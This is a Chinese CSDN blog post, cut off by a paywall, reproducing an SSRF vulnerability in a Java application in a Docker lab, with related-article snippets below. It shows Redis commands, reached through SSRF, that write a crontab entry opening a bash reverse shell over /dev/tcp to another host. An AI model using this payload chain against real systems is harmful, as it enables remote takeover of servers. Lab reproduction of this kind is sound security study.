利用docker进行的SSRF in java的漏洞复现

最新推荐文章于 2024-07-07 16:41:23 发布
最新推荐文章于 2024-07-07 16:41:23 发布
阅读量551 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Candyys/article/details/105475804
版权

1、环境搭建

显示错误:Service 'redis' failed to build: The command '/bin/sh -c set -ex     && yum -y update     && yum -y install gcc-c++ tcl wget' returned a non-zero code: 

服务“redis”生成失败:

未安装redis服务器导致,

这里执行docker-compose up --build            //building redis

编写脚本扫描内网开放端口的主机

通过ssrf 探测到内网中redis服务器 ‘172.19.0.2:6379’正常访问
构造脚本写入 目录‘/etc/crontab‘

```
set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/172.18.0.1/21 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
```

进行url编码:

```
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn
最低0.47元/天 解锁文章
hu4wufu
关注
专栏目录
ssrf漏洞 java反_SSRF漏洞分析与利用
weixin_35431719的博客
02-22 1388
前言:总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的0x01 漏洞产生以curl为例,漏洞代码为ssrf.php$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURL...
Weblogic-SSRF漏洞复现
jklbnm12的博客
01-14 1170
应为这一阵正好在学习SSRF漏洞,又苦于本人太菜没有挖到SSRF,只能复现… 先贴出很早之前央视网SSRF可窥探内网(Weblogic SSRF案例):https://www.secpulse.com/archives/38967.html Weblogic中存在一个SSRF漏洞利用漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件 服务端请求伪造(Server-Side Request Forgery),是指Web服务提供从用户指定的URL读取数据并展示功能又未 对用户输
利用docker搭建漏洞环境,使用SSRF+Redis写入centos以及ubuntu的公钥,实现免密登录
最新发布
繁星
07-07 717
centos和ubuntu的步骤几乎相同,只是由于redis的保护机制,所以会有以下错误,导致部分属性无法修改,解决方法是将protected-mode关闭,使用以下命令;由于redis版本限制的问题,7.2.5的安全性过高,会导致ssh免密登录不成功,所以这里我拉取了5.0.5的版本接着利用同样的操作就可实现免密登录;
redis服务启动失败解决方法之一
yilvyangguang520的博客
10-14 926
redis服务启动失败解决方法之一
DockerBuild报错:The command ‘/bin/sh -c yum install -y vim‘ returned a non-zero code: 1
weixin_53402685的博客
06-15 6578
dockerfile构建遇见的问题
追洞计划 | Gitlab CI Lint API未授权 SSRF漏洞(CVE-2021-22214)
Ms08067安全实验室
06-22 6136
文章来源|MS08067 Web安全知识星球本文作者:Taoing(Web安全攻防合伙人) GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来...
漏洞复现—Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2034
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现—CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
weixin_64655821的博客
10-13 2112
apache漏洞复现-多后缀解析漏洞,换行解析漏洞,2.4.49,2.4.50
hadoop运行jar包出现错误代码为127的解决方案_Exit code: 127
chenjie的博客
09-28 6083
今天在运行程序的时候新发现的一个错误(Exit code: 127),下面提供解决方案,希望能帮助大家。下面是错误的信息: Job job_1601252515583_0001 failed with state FAILED due to: Application application_1601252515583_0001 failed 2 times due to AM Container for appattempt_1601252515583_0001_000002 exited with ex
docker+lnmp 报错小结,以laradock为例,其它同理
stone
04-19 8928
1、安装PHP扩展失败 用vagrant + centos7 + lnmp开发都快两年,这是一个很好用的本地开发环境。对于我来说,它更像是一台真正的linux电脑,能真正直接把握它的每一处地方。而且现在内存都普遍8G以上的本子,加上SSD真的是毫无压力。 但时间一长,暴露出很多很烦人的东西: (1)只对本地有用,到了线上环境又是一堆恶心的依赖报错。当...
SSRF安全威胁在JAVA代码中的应用
angjiu8534的博客
05-26 807
如上图所示代码,在进行外部url调用的时候,引入了SSRF检测:ssrfChecker.checkUrlWithoutConnection(url)机制。 SSRF安全威胁: 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程...
centos7作为Docker基础镜像须知
乞力马扎罗的雪CYF的博客
04-07 5272
centos7基础镜像Dockerfile来构建mysql镜像可能会有问题,在Docker hub上构建失败:Build failed: The command '/bin/sh -c /etc/init.d/mysqld start && mysql -e "grant all privileges on *.* to 'root'@'%' identified by '1234...
linux安装gcc命令步骤(centos安装gcc命令)
sunsineq的专栏
01-14 6944
linux安装gcc命令步骤(centos安装gcc命令) >一、前言 本文介绍在CentOS7.8系统下使用YUM升级GCC版本的相关操作步骤。 CentOS7默认安装的gcc版本是4.8版本,gcc 4.8最主要的一个特性就是全面支持C++11,如果不清楚什么用的也没关系,简单说一些C++11标准的程序都需要gcc 4.8以上版本的gcc编译器编译。很多工具依赖的是更高版本的gcc,比如编译MySQL 8.0(8.0.16以上版本是C++14标准,需gcc 5.3以上版本)、Redis 6.
centos7 yum fastestmirror不能使用
热门推荐
flx的博客
11-21 1万+
[root@localhost ~]# yum install lrzsz Loaded plugins: fastestmirror Could not retrieve mirrorlist http://mirrorlist.centos.org/?release=7&arch=x86_64&repo=os&infra=stock error was 14: curl#6 - "Cou
liunx安装软件报错yum install gcc-c++
Jodl666的博客
10-23 5760
 http://ftp.sjtu.edu.cn/centos/6.9/os/x86_64/repodata/repomd.xml:  [Errno 14] PYCURL ERROR 22 - "The requested URL returned error: 404 Not Found" 尝试其他镜像 错误原因是 http://ftp.sjtu.edu.cn/centos/6.9/os/x86...
利用Docker高效搭建Java Web开发环境指南
通过这个教程,读者可以学习如何利用Docker的优势(如轻量级、快速部署和跨平台兼容性)来构建和部署Java Web应用,提升开发和运维效率。对于希望采用Docker技术的开发者或运维人员来说,这是一个实用且具有参考价值...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值